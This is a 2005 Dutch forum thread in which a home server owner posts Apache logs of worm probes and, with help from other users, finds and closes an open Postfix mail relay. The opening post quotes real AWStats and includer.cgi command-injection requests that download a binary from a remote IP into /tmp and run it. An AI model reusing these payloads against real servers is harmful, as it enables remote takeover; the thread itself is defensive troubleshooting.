Toon posts:

Apache webserver, vreemde 'GET' requests

Pagina: 1
Acties:
  • 155 views sinds 30-01-2008
  • Reageer

maandag 14 november 2005 11:46

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
Ik heb al een paar jaar een linux servertje draaien, nu ongeveer een jaar met GENTOO, wat trwns erg goed bevalt.
Nu heb ik een tijdje geleden mijn startpagina maar es veranderd, zodat hij logt welke ip's er een verbinding maken met mijn server.
Nu komen er nogal vreemde resultaten uit.. en naar het kijken in mijn log file begin ik nog meer te twijfelen aan de mate waarin mijn server dicht zit.

enkele stats:
165 83.115.191.251 80 AOrleans-252-1-65-251.w83-115.abo.wanadoo.fr Wed 9-11-05 19:26:12
175 221.169.56.134 25 221-169-56-134.adsl.static.seed.net.tw Sat 12-11-05 14:18:55
182 59.104.54.161 25 59-104-54-161.adsl.dynamic.seed.net.tw Sun 13-11-05 14:46:42

Het meest vreemde vind ik dat ze op poort 25 connecten (tenmiste dat geeft dit script aan), terwijl ik op 25 m'n mail daemon heb draaien, en zeker geen apache server... 8)7

BTW, dat scriptje maakt gebruik van het volgende:
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['SERVER_PORT'];
$host = gethostbyaddr($ip);
$refer = $_SERVER['HTTP_REFERER'];

En een stukje log:
83.30.113.116 - - [13/Nov/2005:11:31:11 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:12 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%
20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 280
83.30.113.116 - - [13/Nov/2005:11:31:13 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:14 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:15 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:16 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchm
od%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:17 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bch
mod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:18 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:19 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:20 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:21 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc
hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 285
83.30.113.116 - - [13/Nov/2005:11:31:22 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b
chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 286
83.30.113.116 - - [13/Nov/2005:11:31:23 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%
2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:24 +0100] "POST /xmlrpc.php HTTP/1.1" 404 271
83.30.113.116 - - [13/Nov/2005:11:31:25 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:27 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:28 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
83.30.113.116 - - [13/Nov/2005:11:31:29 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:30 +0100] "POST /community/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:31 +0100] "POST /blogs/xmlrpc.php HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:32 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:33 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:34 +0100] "POST /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:35 +0100] "POST /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:36 +0100] "POST /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:37 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:38 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:40 +0100] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\
"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 281

Vooral m'n log staat nogal vol met deze fouten.. Als ik het goed intepreteer, dan lijkt het er op dat iemand de onlangs verschenen lekken in bepaalde php software probeert te misbruiken.
Weet iemand wat dit is en vooral, of het kwaad kan??

Alvast bedankt

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 11:50

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Het zijn inderdaad mensen / bots die zoeken naar bekende lekken in kwetsbare software. Als je geen kwetsbare versies draait kan het verder geen kwaad.

maandag 14 november 2005 11:52

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
En hoe zit het met die poort 25 dan? Dat vind ik vooral vaag...

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 11:57

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Heb je daar een voorbeeldje van dan? Ik zie het niet terug komen in de logs die je hierboven hebt gegeven namelijk.

maandag 14 november 2005 12:03

Acties:
  • killercow
  • Registratie: Maart 2000
  • Laatst online: 28-04 10:32

killercow

eth0

Dat is de zogenaamde lupi worm, deze worm zoekt naar een x aantal bekende lekjes in php en perl software.

mijn gentoo server is iig veilig.

je kunt kijken of je geinfecteerd bent door te zoeken naar /tmp/lupi (als die file er is ben je de lul :P)

openkat.nl al gezien?

maandag 14 november 2005 12:05

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

wellicht is het eerste deel een poging om een mail-deamon op je server te krijgen voor een botnet / spam-forward-servers...

2de deel is idd een gevolg van de laatste mails van sans.org enzo:
oudere versie's van het drupal-forum hebben bv een security-lek waarmee je full access krijgt

en dan heb je natuurlijk van die scriptkiddie's die er een wormpje ofzo voor schrijven of gewoon een script runnen om je server erop te testen:
zolang er over 404 achterstaat: nix van aantrekken, ik heb er ook last van op mijn 3 servers
(2 verschillende domeinen bij 2 verschillende hosters + eentje thuis)

't voordeel van niet de standaard locatie's (lees: mappen en config.) te gebruiken om zoiets te installeren: zulke pogingen komen dan netjes zeer rap in de error-logs te voorschijn

ev. kan je ze wel aangeven aan hun isp met de logs erbij.
ik mag aannemen dat het ip-adres van oorsprong van request ook in je error-log verschijnt ?
(of in je acceess-log-file ?)
geef ze aan:
poging om ongeoorloofd toegang te verkrijgen tot een niet eigen (web-)server is strafbaar in zowat elke europees land, en in de meeste andere landen. ;-)

edit:

btw:
wget%2062%2e101%2e193%2e244%2flupii
(ergens uit je log gecopy-paste

lees ik als: "wget 62.101.193.244/flupii"
mss eens handig om dat ip-adres op te zoeken en zekers aan te geven ?
want de rest komt wrs van geinfecteerde (botnet-)thuis-computers.
maar dat ip is de server waar de file staat, mss kunnen ze die server offline halen ;-)

[ Voor 16% gewijzigd door soulrider op 14-11-2005 12:09 ]

maandag 14 november 2005 12:05

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
die worm heb ik iig niet... Die poort 25 komt naar voren in die stats van mijn startpagina. daar staat: id ip poort host
en die poort is 25. hoe kan dat? ligt dat aan php? of krijgen ze het werkelijk voor elkaar via poort 25??

Ik zie alleen net in m'n messages file het volgende staan:

Nov 14 12:01:31 localhost postfix/smtp[13867]: 3F69118511D: to=<6e6e@ms16.hinet.net>, relay=smtp.wanadoo.nl[194.134.35.175], delay=30606, status=bounced (host smtp.wanadoo.nl[194.134.35.175] said: 554 <adsl-dc-40662.adsl.wanadoo.nl[83.118.164.98]>: Client host rejected: Blocked - see http://spamchk.euronet.nl/ - (in reply to RCPT TO command))

Volgens mij is dus mijn mailserver geblokt, wegens het verzenden van spam.. Wat ik heel raar vind, want ik blok alle ip's voor mijn behalve intern en 2 andere ip's met de volgende regel:
mynetworks = 10.0.0.0/24 130.89.*.*/0 86.80.*.*/0

(Is wel ese tijd dat ik m'n logs ff goed ga doorspitten, want ik wil niet echt als spam/warez server gaan dienen...)

[ Voor 64% gewijzigd door trinite_t op 14-11-2005 12:09 ]

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 12:19

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Ik zou eens kijken of je server niet op wat spam blocklists staat. Verder zie ik dat je het hele UT netwerk wilt accepteren, ook niet echt handig... Ook vraag ik me af wat postfix doet met 130.89.*.*/0 (als 'ie die 0 pakt, dan accepteer je dus eigenlijk alles van het hele internet...). Ik zou als ik jou was eens eerst alleen je lokale netwerk accepteren en dan voor evt. mail versturen van buitenaf authentificatie gebruiken.

maandag 14 november 2005 12:24

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
ow kut.. zie idd nu ook het probleem.. ga het direct fixen :S.. had laatst ff snel die twee adressen toegevoegd... alleen had /28 moeten zijn :'(...

** gefixed ** nu nog uit die spamlists komen :(

Hoe kan ik m'n wachtrij van postfix leegmaken? want als ik postfix nu weer start gaat hij rustig verder met het versturen van mail.. :'(

en even voor de statistieken:

15M postfix/active
16K postfix/bounce
0 postfix/deferred
0 postfix/public
102M postfix/incoming
512 postfix/private

[ Voor 69% gewijzigd door trinite_t op 14-11-2005 12:30 ]

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 12:31

Acties:
  • Arnout
  • Registratie: December 2000
  • Laatst online: 28-04 21:01

Arnout

Eerst maar eens opnieuw configgen, en dan testen. Het lijkt erop dat je een open relay hebt gedraaid, dat is niet zo fraai.

maandag 14 november 2005 12:34

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
Dat heb ik door :'( Dus ik heb mijn configuratie nu wel weer goed gefixed
heb nu weer:
mynetworks = 10.0.0.0/24 130.89.205.175/28 86.80.112.9/28

staan.. (kan /32 eigenlijk ook?)

maar heb nu alleen nog een idioot grote que staan (zie vorige post) ... en die moet ik nog wel kwijt

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 12:35

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Postfix stoppen en dan gewoon maar de /var/spool/postfix leeg gooien... Mocht het dan niet meer werken zou opnieuw postfix emergen het wel moeten oplossen. Je hebt dan iig je hele queue met spam leeg.

edit:


/32 kan prima, maar ik zou als ik jou was hiervoor authentificatie gebruiken met SASL over TLS. Hier zijn wel een flink aantal howto's over te vinden. Voordeel is dan dat je overal secure in kunt loggen via smtp, gebruik het zelf voor o.a. m'n laptop, hoef ik niet settings aan te passen als ik weer eens ergens anders zit en een mailtje wil versturen.

http://postfix.state-of-mind.de/patrick.koetter/smtpauth/

[ Voor 56% gewijzigd door DJ Buzzz op 14-11-2005 12:37 ]

maandag 14 november 2005 12:37

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
Daar heb je helemaal gelijk in.. wilde ik ook nog steeds wel eens doen, maar omdat het altijd vanaf een paar vaste ips gebeurde ben ik er nog steeds niet aan toegekomen

/edit

wachtrij is weer leeg, mynetworks staat nu op /32... nu alleen nog uit die block lijsten zien te komen..

En proberen van m'n schaamte af te komen ..

dit ziet er iig beter uit:
Nov 14 12:42:09 localhost postfix/smtpd[15320]: NOQUEUE: reject: RCPT from imutz.biz[84.244.5.195]: 554 <lu012345@ms35.hinet.net>: Relay access denied; from=<29teresa@ms28.hinet.net> to=<lu012345@ms35.hinet.net> proto=SMTP helo=<imutz.biz>

mocht iemand nog interesse hebben in een lijst met "adressen" van spammers.. ik heb er genoeg ;(

[ Voor 77% gewijzigd door trinite_t op 14-11-2005 12:47 ]

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 13:07

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Al een testje gedaan? Op de volgende site kun je je server laten checken op open relays:

http://www.abuse.net/relay.html

edit:


Verkeerde copy paste :)

[ Voor 20% gewijzigd door DJ Buzzz op 14-11-2005 14:39 ]

maandag 14 november 2005 13:11

Acties:
  • SinergyX
  • Registratie: November 2001
  • Laatst online: 12:08

SinergyX

____(>^^(>0o)>____

djbuzzz schreef op maandag 14 november 2005 @ 13:07:
Al een testje gedaan? Op de volgende site kun je je server laten checken op open relays:

http://www.abuse.net/cgi-bin/relaytest
I didn't understand that
You've been bitten by a broken web page. Sorry about that.

werkt niet ;)

Nog 1 keertje.. het is SinergyX, niet SynergyX
Im as excited to be here as a 42 gnome warlock who rolled on a green pair of cloth boots but was given a epic staff of uber awsome noob pwning by accident.

maandag 14 november 2005 15:23

Acties:
  • MarElo
  • Registratie: Januari 2000
  • Laatst online: 09-02-2025

MarElo

Ik zie je wel!

En wat krijg je nu voor uitslag ?

[ Voor 176% gewijzigd door MarElo op 14-11-2005 15:24 ]

maandag 14 november 2005 17:29

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
Hij zit nu dicht:

Relay test result
All tests performed, no relays accepted.
het is gewoon m'n eigen stomiteit geweest. Snel ff een ip adres toevoegen, en daarachter /0 ipv /32 invullen...
Ik krijg nu alleen nog gruwelijk veel smtp request van andere computers... (1/s ongeveer...alhoewel het wel afbouwd...)

Nog wel een vraagje, volgens dat stukje uit m'n postfix log, zou ik geblokt moeten zijn. Als ik op die url kijk, dan lees je dat je een waarschuwingsmailtje gehad hebt.. zou dat naar het email adres van de provider (m'n wanadoo mail gestuurd zijn?) of naar de server zelf? kan nl niet bij wanadoo mail, en heb de wachtrij van m'n server weg moeten gooien...
Zou ik nog een mailtje naar ze toe moeten sturen? M'n mailserver werkt nl weer helemaal naar behoren.. De email die ik er via verzend komt ook weer aan...

Nog een ding trwns:
Ik weet nu nog steeds niet hoe in mijn statistieken die poort 25 voorkomt!

[ Voor 55% gewijzigd door trinite_t op 14-11-2005 17:46 ]

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 19:13

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Ik gok dat het naar postmaster@jedomein of abuse@jedomein is gestuurd. Het beste kun je even op http://rbls.org/ een check doen waar je op blacklists staat en ook even wanadoo mailen dat je het gefixed hebt. Zou je voor je tweede vraag een een stukje uit je log neer kunnen zetten?

maandag 14 november 2005 19:50

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
een stukje uit mijn logfile.. :

59.104.54.161 - - [13/Nov/2005:14:46:42 +0100] "CONNECT 210.200.181.194:25 HTTP/1.0" 200 866
59.104.54.161 - - [13/Nov/2005:14:46:44 +0100] "CONNECT 210.200.181.194:25 HTTP/1.0" 200 866
59.104.54.161 - - [13/Nov/2005:14:46:45 +0100] "CONNECT 210.200.181.193:25 HTTP/1.0" 200 866

Ik snap niet hoe iets een verbinding kan maken met poort 25 terwijl daar een smtp daemon op draait, en http alleen maar op 80 draait!

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 19:59

Acties:
  • DJ Buzzz
  • Registratie: December 2000
  • Laatst online: 27-04 23:07

DJ Buzzz

Goede kans dat het de remote port van de client is waarmee 'ie connect. Dit komt uit je access log van apache? Zo ja, wat zegt dan CustomLog in je httpd.conf? Misschien staat daar in dat 'ie de remote port van de client logt o.i.d.

[ Voor 21% gewijzigd door DJ Buzzz op 14-11-2005 19:59 ]

maandag 14 november 2005 20:15

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
in m'n httpd staat het zo:

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
LogFormat "%v %h %l %u %t \"%r\" %>s %b %T" script
LogFormat "%v %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" VLOG=%{VLOG}e" vhost
...
CustomLog logs/access_log common

als ik het dus goed begrijp, gebruikt hij dus het 2e logformat?

remot_ host remote_logname remote_user time first_line_of_request status bytes_sent

oftewel, die poort 25 zit in de request... 8)7

The easiest way to solve a problem is just to solve it.

maandag 14 november 2005 20:23

Acties:
  • FF1987
  • Registratie: September 2003
  • Niet online

FF1987

trinite_t schreef op maandag 14 november 2005 @ 19:50:
een stukje uit mijn logfile.. :

59.104.54.161 - - [13/Nov/2005:14:46:42 +0100] "CONNECT 210.200.181.194:25 HTTP/1.0" 200 866
59.104.54.161 - - [13/Nov/2005:14:46:44 +0100] "CONNECT 210.200.181.194:25 HTTP/1.0" 200 866
59.104.54.161 - - [13/Nov/2005:14:46:45 +0100] "CONNECT 210.200.181.193:25 HTTP/1.0" 200 866

Ik snap niet hoe iets een verbinding kan maken met poort 25 terwijl daar een smtp daemon op draait, en http alleen maar op 80 draait!
Volgens mij probeert dat IP adres mails te versturen via je webserver. Ik heb deze logs ook vaak. Het schijnt dat het geen kwaad kan als je je proxy uit hebt staan (ook al geeft hij de 200 "error")?

[ Voor 4% gewijzigd door FF1987 op 14-11-2005 20:24 ]

maandag 14 november 2005 20:25

Acties:
  • trinite_t
  • Registratie: Maart 2003
  • Laatst online: 21-04 15:57

trinite_t

Topicstarter
Aha, maar dan zou hij toch nog steeds niet mijn apache startpagina moeten laden? En dat doet hij dus wel, want hij laad het stukje php script dat bovenaan deze thread staat. En daaruit kwam die poort 25... Dus, hoe komt er een poort 25 in mijn stats, terwijl er echt geen verbinding naar poort 25 gemaakt wordt..

Ik heb zelf met telnet ook es ff met m'n server lopen klooien, ding werkt gewoon als een http server _/-\o_
En heb ook het commando geprobeerd dat er in m'n logs staan.
code:
1

CONNECT 210.200.181.194:25 HTTP/1.0


Dit is dan het resultaat, een foutmelding (400)
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

HTTP/1.1 400 Bad Request
Date: Mon, 14 Nov 2005 20:14:41 GMT
Server: Apache
Content-Length: 291
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                                                  <html><head>
                                                              <title>400 Bad Request</title>
            </head><body>
                         <h1>Bad Request</h1>
                                             <p>Your browser sent a request that this server could not understand.<br />
                                        </p>
                                            <hr>
                                                <address>Apache Server at trinite.mine.nu Port 80</address>
                           </body></html>


ook zie ik in m'n stats niets.. 8)7 wat eigenlijk logisch is, aangezien de startpagina niet geladen wordt... maar waarom ik wel stats krijg van die andere bak 8)7

[ Voor 97% gewijzigd door trinite_t op 14-11-2005 21:24 ]

The easiest way to solve a problem is just to solve it.

Pagina: 1
Reageer